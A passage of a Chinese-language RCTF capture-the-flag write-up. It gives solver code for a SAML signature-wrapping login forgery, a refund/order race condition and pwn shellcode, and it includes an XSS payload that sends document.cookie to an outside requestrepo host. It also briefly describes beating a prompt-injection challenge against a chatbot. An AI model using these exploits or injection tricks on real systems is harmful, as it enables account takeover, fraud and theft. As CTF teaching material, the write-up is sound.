print("[+] Login status:", resp.getcode(), "URL:", resp.geturl())
if "Invalid username or password" in body:
print("[!] Login failed")
return False
return True
def get_legit_saml_response(opener):
url = f"{IDP_BASE}/saml/idp/Flag"
resp = opener.open(url, timeout=10)
html = resp.read().decode("utf-8", errors="ignore")
print("[+] IdP-initiated SSO status:", resp.getcode(), "URL:", resp.geturl())
if "Access Denied" in html or "do not have permission" in html:
print("[!] No permission to access SAML service")
print(html[:300])
return None
m = re.search(r'name="SAMLResponse"\s+value="([^"]+)"', html)
if not m:
print("[!] Could not find SAMLResponse in HTML. Snippet:")
print(html[:500])
return None
saml_response = m.group(1)
print("[+] Extracted SAMLResponse length:", len(saml_response))
return saml_response
def build_malicious_saml_response(orig_b64):
try:
xml = base64.b64decode(orig_b64).decode("utf-8", errors="ignore")
except Exception as e:
print("[!] Failed to decode original SAMLResponse:", e)
return None
start = xml.find("<saml:Assertion")
if start == -1:
print("[!] No <saml:Assertion> found in SAML response")
return None
end = xml.find("</saml:Assertion>", start)
if end == -1:
print("[!] Unterminated <saml:Assertion>")
return None
end += len("</saml:Assertion>")
assertion_xml = xml[start:end]
# Remove the signature from the copied assertion (we keep it only on the original one)
assertion_no_sig = re.sub(
r"<ds:Signature.*?</ds:Signature>",
"",
assertion_xml,
flags=re.S,
)
# Change NameID to admin email
assertion_admin = re.sub(
r"(<saml:NameID[^>]*>)(.*?)(</saml:NameID>)",
r"\1admin@rois.team\3",
assertion_no_sig,
count=1,
flags=re.S,
)
# Remove ID attribute to avoid conflicts and signing
assertion_admin = re.sub(r'\sID="[^"]+"', "", assertion_admin, count=1)
# Insert malicious assertion before the original one
manipulated_xml = xml[:start] + assertion_admin + xml[start:]
new_b64 = base64.b64encode(manipulated_xml.encode("utf-8")).decode("ascii")
return new_b64
def send_to_sp(saml_response_b64):
opener_sp = make_opener()
data = urllib.parse.urlencode(
{
"SAMLResponse": saml_response_b64,
}
).encode()
url = f"{SP_BASE}/saml/acs"
resp = opener_sp.open(url, data=data, timeout=10)
body = resp.read().decode("utf-8", errors="ignore")
final_url = resp.geturl()
print("[+] Final URL after ACS:", final_url)
print("[+] Response body (first 500 chars):")
print(body[:500])
m_flag = re.search(r"(RCTF\\{[^}]+\\})", body)
if m_flag:
print("[+] FLAG:", m_flag.group(1))
else:
print("[!] FLAG pattern not found in response")
def main():
username = "evil_" + random_string()
email = f"{username}@example.com"
password = "Password123!"
print("[*] Using username:", username)
opener = make_opener()
# 1) Register user with crafted type
if not register_invited_user(opener, username, email, password):
return 1
# 2) New opener (fresh session) and login so userType comes from DB (type=0)
opener = make_opener()
if not login(opener, username, password):
return 1
# 3) Get legitimate SAMLResponse for this user
legit_b64 = get_legit_saml_response(opener)
if not legit_b64:
return 1
# 4) Build malicious wrapped SAMLResponse with NameID=admin@rois.team
evil_b64 = build_malicious_saml_response(legit_b64)
if not evil_b64:
return 1
print("[+] Built malicious SAMLResponse, length:", len(evil_b64))
# 5) Send to SP and print flag
send_to_sp(evil_b64)
return 0
if __name__ == "__main__":
sys.exit(main())

UltimateFreeloader
把附件给的 jar 包反编译一下,分析一下源码可以看到这是一个基于 Spring Boot 的电商购物系统后端应用,然后有很多的功能模块,/api/flag/get 接口用于返回flag,但是有很多限制:
- 用户已认证(有效的JWT token)
- 购买并完成(状态为 COMPLETED)以下4个商品:
- Little Potato(小土豆)- 5.50
- Sweet Potato(地瓜)- 8.80
- Fish Fish(鱼)- 4.20
- Large Potato(大土豆)- 10.00
- 用户余额必须等于 10.00(不能低于10)
- 用户必须有一个未使用的优惠券
如果我们注册一个用户,我们的初始余额是10元,然后默认有一个 10.00 的优惠券,分析整个题目,从揣摩出题人的角度可以看出来,这个题的目标应该是想让我们零元购商品,毕竟最后的要求是我们的余额还是10,所以肯定不是想找个什么办法刷钱啥的,而是要求我们在保留优惠券的情况下零元购所有商品
再看代码可以发现项目里有一个redis锁,创建订单的时候有一个锁防止我们同时创建多个订单,退款的时候有一个锁防止我们重复退款。用户其实一共就只能进行两个操作,一个是创建订单(可以选择使用优惠券),另一个是退款,既然没法在创建订单时并发做竞争,也没法在退款时并发做竞争,唯一可行的方法就是在创建订单和退款之间并发做竞争了。
想要在退款和创建订单之间做竞争,前提肯定是现在我们有一个购买成功的订单,有了这个订单之后我们才能退款,然后再想办法再创建订单,因为用户的钱是有限的,只有10元,要是不使用优惠券比如买了 Large Potato 之后就没钱买其他东西了,所以退款订单和创建订单二者之间必然有一个订单是通过优惠券创建的。
这里再思考这两个订单是哪个订单是用优惠券创建的,假设创建订单用优惠券创建,退款订单是直接花钱买的,即使我们竞争成功实现零元购也没意义,用优惠券创建订单本来就不用花钱,而且优惠券也没了,所以唯一的可能就是退款订单是用优惠券创建的,创建订单是直接花钱买的,说不定还有奇迹发生,能通过某种神奇的方式利用竞争免费创建订单。
先头脑风暴一下大概的思路,然后仔细分析一下这一块的代码,先看到创建订单这里,过程大概就是先对购买操作上锁,然后校验用户和商品,接着计算价格,如果优惠券金额大于商品价格,最终价格会被置为 0,最后检查余额是否能支付这个最终价格。

代码这里看起来没什么问题,后面就是数据库这边的操作了,会先用this.orderMapper.insert(order): 在订单表 orders 中插入一条新的订单记录,接着用 BigDecimal newBalance = user.getBalance().subtract(finalPrice);计算一个新余额,最后用this.userService.updateBalance(userId, newBalance)把新余额写入用户的账户,这里的逻辑其实就非常的奇怪了,正常的代码逻辑应该是对数据库里的余额做加减,这里却是算出一个新余额后替换数据库里的余额,并且还没上锁,一看就很可疑的样子。

然后再看到退款这边的逻辑,可以看到差不多,先用加法算一下当前的余额加上退款后的值得到一个新余额,然后用this.userService.updateBalance把用户的余额替换成新余额的值。

所以之前的思路确实是没问题的,就是要在退款订单和创建订单之间并发做竞争,假设退款订单的顺序是1.检查订单是否合法2.将余额替换成10(假设退款后的余额应该是10),创建订单的顺序是3.检查订单是否合法4.将余额替换成0(假设购买后的余额应该是0),只要竞争到一个1342的顺序,就能在完成创建订单的所有操作后反而执行到退款订单的操作2,将余额替换成10,这样就成功实现零元购了。
因此思路就是在退款订单(用券)和创建订单(不用券)之间一直并发做条件竞争,直到竞争到某个创建订单是零元购才停,否则一直竞争,最后把四个商品全部零元购,这样就能在不花钱或者优惠券的情况下完成所有订单的购买
import random
import string
import threading
import time
from decimal import Decimal
import requests
BASE_URL = "http://127.0.0.1:8086"
# BASE_URL = "http://61.147.171.35:51469"
TARGET_PRODUCTS = ["Little Potato", "Sweet Potato", "Fish Fish", "Large Potato"]
BASE_PRODUCT_NAME = "Little Potato"
SESSION = requests.Session()
def api_request(method, path, token=None, **kwargs):
url = BASE_URL + path
headers = kwargs.pop("headers", {})
if token:
headers["Authorization"] = f"Bearer {token}"
if "json" in kwargs and "Content-Type" not in headers:
headers["Content-Type"] = "application/json"
for _ in range(3):
try:
resp = SESSION.request(method, url, headers=headers, timeout=5, **kwargs)
try:
return resp.json()
except Exception:
return {"code": resp.status_code, "raw": resp.text}
except Exception:
time.sleep(0.2)
return {"code": -1, "error": "request failed"}
def random_username():
return "ctf" + "".join(random.choices(string.ascii_lowercase + string.digits, k=8))
def register_user():
while True:
username = random_username()
email = f"{username}@example.com"
body = {"username": username, "password": "Pass1234", "email": email}
data = api_request("POST", "/api/user/register", json=body)
if data.get("code") == 200 and data.get("data", {}).get("success"):
d = data["data"]
user = d["user"]
print(f"[+] Registered user {username}")
return user["id"], d["token"]
else:
print("[-] register failed:", data)
time.sleep(0.5)
def get_products(token):
data = api_request("GET", "/api/product/list", token=token)
assert data.get("code") == 200, data
products = data["data"]
return {p["name"]: p["id"] for p in products}
def get_coupon_info(token):
data = api_request("GET", "/api/coupon/my", token=token)
assert data.get("code") == 200, data
coupons = data["data"]
assert coupons
return coupons[0]
def get_user_balance(token):
data = api_request("GET", "/api/user/info", token=token)
assert data.get("code") == 200, data
return Decimal(str(data["data"]["balance"]))
def get_orders(token):
data = api_request("GET", "/api/order/my", token=token)
assert data.get("code") == 200, data
return data["data"]
def create_order(token, product_id, quantity="1", coupon_id=None):
body = {
"productId": product_id,
"quantity": quantity,
"couponId": coupon_id,
}
return api_request("POST", "/api/order/create", token=token, json=body)
def refund_order(token, order_id):
return api_request("POST", f"/api/order/refund/{order_id}", token=token)
def ensure_coupon_unused(token, coupon_id):
coupon = get_coupon_info(token)
if not coupon["isUsed"]:
return
orders = get_orders(token)
for o in orders:
if o.get("couponId") == coupon_id and o["status"] == "COMPLETED":
print(f" [*] Restoring coupon by refunding order {o['id']}")
refund_order(token, o["id"])
break
coupon = get_coupon_info(token)
assert not coupon["isUsed"]
def zero_cost_purchase(token, product_ids, coupon_id, target_name, max_tries=30):
target_pid = product_ids[target_name]
base_pid = product_ids[BASE_PRODUCT_NAME]
for attempt in range(1, max_tries + 1):
print(f" [*] {target_name} try #{attempt}")
ensure_coupon_unused(token, coupon_id)
base_resp = create_order(token, base_pid, quantity="1", coupon_id=coupon_id)
if base_resp.get("code") != 200 or not base_resp.get("data", {}).get("success"):
print(" [-] base order failed:", base_resp)
time.sleep(0.2)
continue
base_order_id = base_resp["data"]["order"]["id"]
create_result = {}
refund_result = {}
def t_create():
nonlocal create_result
create_result = create_order(
token, target_pid, quantity="1", coupon_id=None
)
def t_refund():
nonlocal refund_result
refund_result = refund_order(token, base_order_id)
threads = [threading.Thread(target=t_create), threading.Thread(target=t_refund)]
for t in threads:
t.start()
for t in threads:
t.join()
balance = get_user_balance(token)
target_order_id = None
success_create = create_result.get("code") == 200 and create_result.get(
"data", {}
).get("success")
if success_create:
target_order_id = create_result["data"]["order"]["id"]
orders = get_orders(token)
has_target_completed = any(
o["productId"] == target_pid and o["status"] == "COMPLETED" for o in orders
)
print(f" [*] balance={balance}, target_completed={has_target_completed}")
if balance == Decimal("10.00") and has_target_completed:
print(f" [+] Got free COMPLETED order for {target_name}")
return True
if target_order_id:
print(f" [*] refund target order {target_order_id} to restore balance")
refund_order(token, target_order_id)
balance_after = get_user_balance(token)
print(f" [*] balance after refund={balance_after}")
if balance_after < Decimal("4.20"):
print(" [-] balance too low after refund, give up this user")
return False
else:
if balance < Decimal("4.20"):
print(" [-] balance too low, give up this user")
return False
time.sleep(0.2)
print(f" [-] Max tries reached for {target_name}, give up on this user.")
return False
def conditions_satisfied(token, product_ids, coupon_id):
orders = get_orders(token)
balance = get_user_balance(token)
coupon = get_coupon_info(token)
completed = [o for o in orders if o["status"] == "COMPLETED"]
completed_pids = {o["productId"] for o in completed}
has_all_products = all(pid in completed_pids for pid in product_ids.values())
has_balance_10 = balance == Decimal("10.00")
has_unused_coupon = not coupon["isUsed"]
return has_all_products, has_balance_10, has_unused_coupon, orders
def get_flag(token):
data = api_request("GET", "/api/flag/get", token=token)
print("[+] /api/flag/get:", data)
return data
def exploit_once():
user_id, token = register_user()
products = get_products(token)
for name in TARGET_PRODUCTS:
assert name in products, f"product {name} not found"
coupon = get_coupon_info(token)
coupon_id = coupon["id"]
print(
f"[+] User {user_id}, coupon_id={coupon_id}, balance={get_user_balance(token)}"
)
for name in TARGET_PRODUCTS:
ok = zero_cost_purchase(token, products, coupon_id, name)
if not ok:
return False
has_all, has_bal10, has_unused, _ = conditions_satisfied(token, products, coupon_id)
print(
f"[+] Final check: products={has_all}, balance10={has_bal10}, coupon_unused={has_unused}"
)
if has_all and has_bal10 and has_unused:
print("[+] Conditions satisfied, requesting flag...")
get_flag(token)
return True
return False
if __name__ == "__main__":
for attempt in range(1, 6):
print(f"===== Attempt {attempt} =====")
try:
if exploit_once():
break
except Exception as e:
print(f"[!] Error in attempt {attempt}: {e}")
time.sleep(0.5)
因为是条件竞争,所以能不能打出来有点看脸,实现不行刷新靶机多试几次
author
augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled.
xss-shield.js:3 blocked!
xss-shield.js:517 XSS Shield activated
我们首先要找到绕过xss-shield.js的方法,先寻找一个其他的可控点
查看php源代码发现 htmlspecialchars() 默认不编码单引号
发现属性注入利用点
<meta name="author" content=<?php echo $pageAuthor; ?>>
可以利用这一点进行任意跳转
<meta name="author" content="0;url=" http-equiv="refresh">
使用恶意用户名插入CSP策略阻止wafjs加载
'script-src-elem http://localhost:8081/assets/js/article.js;script-src unsafe-inline' http-equiv='Content-Security-Policy'
bot侧需改为
http://blog-app
augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled.
5278586407747584:1 Refused to load the script 'http://localhost:8081/assets/js/purify.min.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js".
5278586407747584:1 Refused to load the script 'http://localhost:8081/assets/js/xss-shield.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js".
现在成功使用csp,阻止了xss-shield.js,和purify
<img src=x onerror="new Image().src='http://cca6vtq5.requestrepo.com/steal?cookie='+encodeURIComponent(document.cookie);">
augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled.
5281336646434816:1 Refused to load the script 'http://localhost:8081/assets/js/purify.min.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js".
5281336646434816:1 Refused to load the script 'http://localhost:8081/assets/js/xss-shield.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js".
x:1 GET http://localhost:8081/article/x 404 (Not Found)
5281336646434816:1 Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src unsafe-inline unsafe-hashes". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.
script-src 'unsafe-inline'才是合法的形式,script-src unsafe-inline是不合法的htmlspecialchars()又会编码",所以我无法正确包裹csp头,使用这种方式加载外部脚本获得flag
<iframe srcdoc='<script src="http://{url}/exp.js"></script>'></iframe>
Misc
Signin
签
Speak Softly Love
网络取证题
第一问
根据视频的信息,直接在youtube里搜关键词快速定位到了这个视频,答案为8ssDGBTssUI

第二问
视频介绍里,提到了这个项目的网站

进网站可以看到有对应的项目仓库,装个svn的gui工具

访问仓库,可以看到有若干版本

在v0.9里找到soft error相关的记录,发现revision是178,所以答案是r178(gpt告诉我的格式)

第三问
在网站里可以快速定位到作者的个人官网https://mateusz.viste.fr/
在最下面可以找到

答案是https://mateusz.viste.fr/mateusz.ogg
第四问
个人主页里提到了有一个gopher空间,访问进去可以找到捐赠链接

或者直接搜关键词也能看到


Wanna Feel Love
网络取证题
第一问
题目给了个附件 里面是有eml邮件
看了一下邮件内容,一眼垃圾邮件隐写 解隐写拿到

第二问
邮件里有个xm文件 ai分析一波发现要用OpenMPT打开,下个工具
说是要提取feel的信息,切到feel的波形发现明显是转01,黑为0红为1


写脚本提取
import soundfile as sf
import numpy as np
VOLUME_THRESHOLD = 0.3 # 判断音量高低的阈值
def rms_volume(segment):
"""计算该音频片段的 RMS 平均音量"""
return np.sqrt(np.mean(segment ** 2))
def extract_volume_bits(path):
audio, sr = sf.read(path)
# 多声道 -> 单声道
if audio.ndim > 1:
audio = audio.mean(axis=1)
segment_samples = int(0.050 * sr) # 50ms
bits = []
for i in range(0, len(audio), segment_samples):
segment = audio[i:i + segment_samples]
if len(segment) < segment_samples:
break
vol = rms_volume(segment)
bit = 1 if vol >= VOLUME_THRESHOLD else 0
bits.append(str(bit))
return "".join(bits)
if __name__ == "__main__":
path = "Feel.flac"
bitstring = extract_volume_bits(path)
print(bitstring)
得到答案I Feel Fantastic heyheyhey
第三问 通过搜索第二问的答案可以找到这个猎奇小玩意

然后可以gpt梭哈

第四问
继续gpt梭哈,页面也可以自己搜到,不难

同时通过调查可以发现一篇关键文章 https://yitzilitt.medium.com/the-story-behind-i-feel-fantastic-tara-the-singing-android-and-john-bergeron-fc83de9e8f36 里面有我们想要的所有内容
第五问
在关键文章的评论里可以找到
答案为https://www.findagrave.com/memorial/63520325/john-louis-bergeron

Shadows of Asgard
流量分析题
第一问
跟踪第一个http流就看到了

第二问
往后分析,发现这里传了aeskey和iv还有data,说明是aes加密了数据 并且key一直没变

ai搞了个脚本来解密
import base64
import json
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
# === 填入你的数据 ===
aesKey_b64 = "WzUsMTM5LDI0NSwyMjAsMjMxLDQ2LDIzNCwxNDYsMjQ4LDIxMSwyLDIxMywyLDE2NSw5OCwxMTgsMTAzLDE2MiwzLDE1MCw0LDUzLDE3OSwxOTQsODQsMjA3LDQ1LDI0NSw4OCwxNzksMTkzLDEwMV0="
aesIV_b64 = "WzEyNCwyMzIsMjU0LDE5LDI1MCw0OSw1MCw4MywyMjksMjQ0LDI4LDIyMiw4MywzMywyMDIsNl0="
data_hex = "6781ed63ff3d0c5a8960573c821f293cf3f59d678671645d40a72c9ed3bbccd29ad40f754ef11b77b033f8338888a30080f7dfb242241bf1fae6e4cd903e3c257457846ece5bb9c190ee9fc367f728daadabfabf929e75c7db7e111a32919c0e"
# === decode key/iv ===
aesKey = bytes(json.loads(base64.b64decode(aesKey_b64)))
aesIV = bytes(json.loads(base64.b64decode(aesIV_b64)))
ciphertext = bytes.fromhex(data_hex)
def try_aes_cbc(key, iv, ct):
try:
cipher = AES.new(key, AES.MODE_CBC, iv)
pt = cipher.decrypt(ct)
# CBC 需要去 padding
return unpad(pt, AES.block_size).decode('utf-8', errors='replace')
except Exception:
return None
def try_aes_ctr(key, iv, ct):
try:
# CTR 的 iv 是 nonce
cipher = AES.new(key, AES.MODE_CTR, nonce=iv)
pt = cipher.decrypt(ct)
return pt.decode('utf-8', errors='replace')
except Exception:
return None
# === 尝试解密 ===
print("=== 尝试 AES-256-CBC ===")
cbc_res = try_aes_cbc(aesKey, aesIV, ciphertext)
print(cbc_res if cbc_res else "CBC 解密失败")
print("\n=== 尝试 AES-256-CTR ===")
ctr_res = try_aes_ctr(aesKey, aesIV, ciphertext)
print(ctr_res if ctr_res else "CTR 解密失败")
解出路径

第三问
一样的解数据,根据描述藏了隐写,同一个流里发现png图片内有base数据

提出来解密就行,得到id

第四问
找数据然后解密

第五问
接着解数据


The Alchemist’s Cage
ez提示注入题
进去先输个soul 创建个对象
然后就可以开始在五轮内进行注入攻击了,很简单的,随便让它爆爆就出来了,这里是让它重复上一轮回复,当出现指定关键词(这里是谎言),输出关键字符串

Asgard Fallen Down
流量分析题
Challenge 1: The First Command
干扰的流量太多,不太好找
在流207中发现类似连接成功的流量

解码看看,看到了熟悉的进程

同时我们注意到,响应包中有三个奇怪的base64字符串

解码看一下,发现第一个长度是32,第二个是16,猜测为AES的key和iv


继续往后看,在之后紧跟着的包中看到,一串神秘的base64

使用之前得到的密钥和iv可以成功解密

得到命令spawn whoami
然后在之后的

得到命令执行结果

Challenge 2: The Heartbeat
很明显之前的命令执行过程含有心跳包机制,在207流中很明显看到时间间隔是10s

Challenge 3: The Heart of Iron
继续解密即可


找到响应包解密


得到答案Intel64 Family 6 Model 191 Stepping 2, GenuineIntel
Challenge 4: Odin’s Eye
搜索关键词build:20251115可在2787流中找到本题的执行命令


发现之后有很多大块的响应包,猜测是可能图片base64后太大一次不好传输于是分段传输
正则匹配,解密

不知道为啥cbc没解出来,cbcnopadding出了
解密result

得到图片,工具是TscanPlus

vault
丢给ai分析大概知道是要用sui环境去编译然后运行程序跟靶机进行交互
去下个预编译好的程序,然后就可以跑了
关键在代码
但是不懂区块链只能让ai帮忙做,换了两轮ai,gpt和gemini都怪怪的,最后用claude梭出来了
改了客户端的vault.move 然后修改Move.toml和Solve.move拿到了flag


https://claude.ai/share/87c74de4-00d5-4ac9-bfce-a8faecb24525


module solution::solution { use sui::coin::{Self, TreasuryCap}; use sui::tx_context::TxContext; use challenge::vault::{Self, Vault, AirdropTracker}; use challenge::vault_coin::VAULT_COIN; public fun solve( vault: &mut Vault, tracker: &mut AirdropTracker, treasury: &mut TreasuryCap<VAULT_COIN>, ctx: &mut TxContext ) { vault::request_airdrop(tracker, treasury, ctx); let proof_coin = coin::mint(treasury, 100_000_000_000, ctx); vault::buy_flag(tracker, vault, proof_coin, ctx); } }

Pwn
only
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'\x00'))
uu64 = lambda x : u64(x.ljust(8,b'\x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))
attack = '101.245.98.115 26100'.replace(' ',':')
binary = './chal'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'),ssl=True)
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
#context(arch='amd64', log_level = 'debug')
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
#libc = context.binary.libc
#elf = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '192.168.64.1', 10808)
gdbscript = '''
brva 0x001A40
brva 0x001A32
#continue
'''.format(**locals())
#import os
#os.systimport os
#io = remote(*attack.split(':'))
io = start([])
def notes():
ru('exit\n')
sl('1')
def add(size):
ru('back\n')
sl('1')
ru('size:')
sl(str(size))
def rm():
ru('back\n')
sl('2')
def save(fn):
ru('back\n')
sl('3')
def edit(text):
ru('back\n')
sl('4')
ru('asdf')
#notes()
import struct
def li2double(bt): # long long int to double
float_value = struct.unpack('!d', bt)[0]
return float_value
v = li2double(p64(0xD0E0A0D0B0E0E0F)[::-1])
gdb.attach(io,gdbscript=gdbscript)
ru('exit\n')
sl('2')
ru('input:\n')
sl(str(v))
sc = '''
pop rsi
pop rsi
pop rdx
pop rsi
pop rsi
pop rsi
syscall
'''
sc = asm(sc)
ru(b'Make a choice:')
sl('1')
ru('your code:')
sl(sc)
sleep(0.1)
#pause()
pay = b'\x90' * 0x40 + asm(shellcraft.cat('flag'))
sl(pay)
itr()
only_rev
Shellcode 改一下就行了
sc = '''
syscall
xchg rcx,rsi
mov edx,esi
syscall
'''
sc = asm(sc)
ru(b'Make a choice:')
sl('1')
#gdb.attach(io,gdbscript=gdbscript)
ru('your code:')
s(sc)
#pause()
sleep(0.1)
pay = b'\x90' * 0x40 +asm('mov rsp,rsi')+ asm(shellcraft.cat('flag'))
sl(pay)
no_check_WASM
赛后复现:https://flyyy.top/2025/11/17/rctf-2025-no_check_WASM/
Crypto
SuanP01y
GPT一把梭版本
from sage.all import *
from hashlib import md5
from Crypto.Cipher import AES
r, d = 16381, 41
R.<x> = PolynomialRing(GF(2))
S.<X> = R.quo(x^r - 1) # over GF(2): '-' == '+'
m = x^r - 1 # i.e., x^r + 1
def hwt(p):
return len(p.exponents())
def min_arc_len(exps, n=r):
""" minimal cyclic interval length covering all exponents on Z_n """
if not exps: return 0
exps = sorted(e % n for e in exps)
gaps = [ (exps[(i+1)%len(exps)] - exps[i]) % n for i in range(len(exps)) ]
return n - max(gaps)
def in_window(p, lim=r//3):
return min_arc_len(p.exponents(), r) <= lim
def rotate_R(p, s):
s %= r
return R((S(p) * (X**s)).lift())
def try_reconstruct_once(qR):
r0, r1 = m, qR
s0, s1 = R(1), R(0)
t0, t1 = R(0), R(1)
while r1 != 0:
qout, rem = r0.quo_rem(r1)
r0, r1 = r1, rem
s0, s1 = s1, s0 - qout*s1
t0, t1 = t1, t0 - qout*t1
A, B = r0, t0
# weight + window heuristic
if hwt(A) == d and hwt(B) == d and in_window(A) and in_window(B):
U = R((S(qR) * S(B)).lift()) # q * B
if hwt(U) == d and A != 0 and U != 0:
Delta = (U.exponents()[0] - A.exponents()[0]) % r
if rotate_R(A, Delta) == U: # check alignment
return A, B, Delta
# maybe swapped
U2 = R((S(qR) * S(A)).lift())
if hwt(U2) == d and B != 0 and U2 != 0:
Delta = (U2.exponents()[0] - B.exponents()[0]) % r
if rotate_R(B, Delta) == U2:
return B, A, Delta
return None
def rational_reconstruct(qR):
res = try_reconstruct_once(qR)
if res is not None:
return res
shift = r//3 + 1 # 5461
qR_shift = rotate_R(qR, shift)
res = try_reconstruct_once(qR_shift)
if res is None:
raise RuntimeError("Rational reconstruction failed (unexpected).")
A, B, Delta = res
A = rotate_R(A, r - shift)
return A, B, Delta
hint_line, ct_hex = open("output.txt","r").read().splitlines()
hint_str = hint_line.split("=",1)[1].strip()
qS = S(hint_str) # parse hint in S
qR = R(qS.lift()) # canonical representative in R with deg < r
C = bytes.fromhex(ct_hex.strip())
A, B, Delta = rational_reconstruct(qR)
assert gcd(B, m) == 1
for k0 in range(r):
h0 = S(B) * (X**k0)
key = md5(str(h0).encode()).digest()
pt = AES.new(key=key, mode=AES.MODE_CTR, nonce=b"suanp01y").decrypt(C)
if pt.startswith(b"RCTF{") and pt.endswith(b"}"):
print("flag =", pt.decode())
print("k0 =", k0)
break
SuanHash
通过短消息学习状态差 Δs₁,再用 Δs₁ 补偿第二块,使两条长消息在最后一块完全一致,从而构造确定性哈希碰撞
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import os
# ===== 配置 =====
HOST = "1.14.196.78"
PORT = 42103
context.log_level = "info"
# ===== 工具函数 =====
def pad_block_of_short_msg(m: bytes) -> bytes:
"""
对长度 <= 15B 的短消息,返回其"首块"(16B):
data = m + 0x80 + 0填充至16字节;只取这16字节。
"""
assert len(m) <= 15
return m + b"\x80" + b"\x00" * (16 - len(m) - 1)
def b2i(b: bytes) -> int:
return int.from_bytes(b, "big")
def i2b128(x: int) -> bytes:
return x.to_bytes(16, "big")
def xor_bytes(a: bytes, b: bytes) -> bytes:
return bytes(x ^ y for x, y in zip(a, b))
def recv_prompt(io, prompt=b"(hex): ", timeout=20):
"""稳妥等待输入提示 '(hex): ',避免卡死"""
io.recvuntil(prompt, timeout=timeout)
def send_hex_get_H(io, raw: bytes) -> bytes:
"""发送 raw(以hex),并解析返回的 'H = ...' 为 bytes"""
io.sendline(raw.hex().encode())
line = io.recvline(timeout=20)
if not line:
raise EOFError("对端在返回哈希前断开")
s = line.decode(errors="ignore").strip()
# 形如: H = f338fbc9e95d95f5a778be8902643b67
assert s.startswith("H = "), f"意外返回:{s}"
return bytes.fromhex(s[4:])
def recv_round_result(io):
"""发送完4条后读取回合结果行"""
res = io.recvline(timeout=20)
if not res:
raise EOFError("对端在回合结果前断开")
text = res.decode(errors="ignore").strip()
print(text)
# 可能还有空行
try:
extra = io.recvline(timeout=0.3)
if extra:
print(extra.decode(errors="ignore"), end="")
except EOFError:
pass
return text
# ===== 关键:每轮4次查询的确定性碰撞 =====
def play_round(io, round_idx: int):
# Step 1/2: 两条"短消息"学习 Δz1
A_short = b"" # 空串(单块)
B_short = b"\x00" # 单字节(单块)
# 1) A_short
recv_prompt(io) # 等 "MSG 1 (hex): "
H1 = send_hex_get_H(io, A_short) # 得到 H1
# 2) B_short
recv_prompt(io) # 等 "MSG 2 (hex): "
H2 = send_hex_get_H(io, B_short) # 得到 H2
# 计算对应的首块 B1, B2(我们本地可完全确定)
B1 = pad_block_of_short_msg(A_short) # 16B
B2 = pad_block_of_short_msg(B_short) # 16B
# 拆 H 为 hi/lo(8B+8B)
H1_hi, H1_lo = b2i(H1[:8]), b2i(H1[8:])
H2_hi, H2_lo = b2i(H2[:8]), b2i(H2[8:])
B1_lo, B2_lo = b2i(B1[8:]), b2i(B2[8:])
# Δz1 = (Δhi || Δlo),其中 Δlo 需扣除 y_lo 差异 => ⊕(B1_lo ⊕ B2_lo)
dz_hi = H1_hi ^ H2_hi
dz_lo = (H1_lo ^ H2_lo) ^ (B1_lo ^ B2_lo)
Dz = (dz_hi << 64) | dz_lo
Dz_bytes = i2b128(Dz) # 16B
# Step 3/4: 两条"长消息"(32B)对齐第二块状态 + 共用PAD
# 选择任意 16B 的 X,令 X' = X ⊕ Δz1
X = os.urandom(16)
Xp = xor_bytes(X, Dz_bytes)
# 构造两条32B消息:A_long = [B1 | X],B_long = [B2 | X']
# 注意:服务端对任意 msg 都会再追加 0x80 并补到16倍数,
# 所以这两条32B消息最终都会再加一个纯 PAD 块(0x80 + 15*00)作为第3块。
A_long = B1 + X
B_long = B2 + Xp
# 3) A_long
recv_prompt(io) # 等 "MSG 3 (hex): "
_ = send_hex_get_H(io, A_long)
# 4) B_long
recv_prompt(io) # 等 "MSG 4 (hex): "
_ = send_hex_get_H(io, B_long)
# 读回合结果(应为"✅ Hash collision found! Next round.")
res = recv_round_result(io)
if "No hash collision" in res or "Game over" in res:
raise RuntimeError(f"第 {round_idx} 轮未碰撞,异常(逻辑应保证碰撞)")
def main():
io = remote(HOST, PORT)
round_idx = 1
try:
# 完成500轮
for round_idx in range(1, 501):
log.info(f"Round {round_idx}")
play_round(io, round_idx)
log.success("完成500轮!等待flag...")
# 尝试接收所有剩余数据(包括flag)
import time
time.sleep(1)
# 接收所有可用的数据
while True:
try:
data = io.recv(1024, timeout=2)
if data:
print(data.decode('utf-8', errors='replace'))
else:
break
except:
break
except EOFError:
log.info("连接关闭,尝试接收剩余数据...")
# 即使连接关闭,也可能有缓冲的数据
try:
while True:
data = io.recv(1024, timeout=1)
if data:
print(data.decode('utf-8', errors='replace'))
else:
break
except:
pass
except Exception as e:
log.error(f"错误: {e}")
finally:
io.close()
if __name__ == "__main__":
main()
🎉 Nice! Here is your flag: RCTF{my_sponge_is_toooooooo_soft_cdb801e6adbd}
RePairing
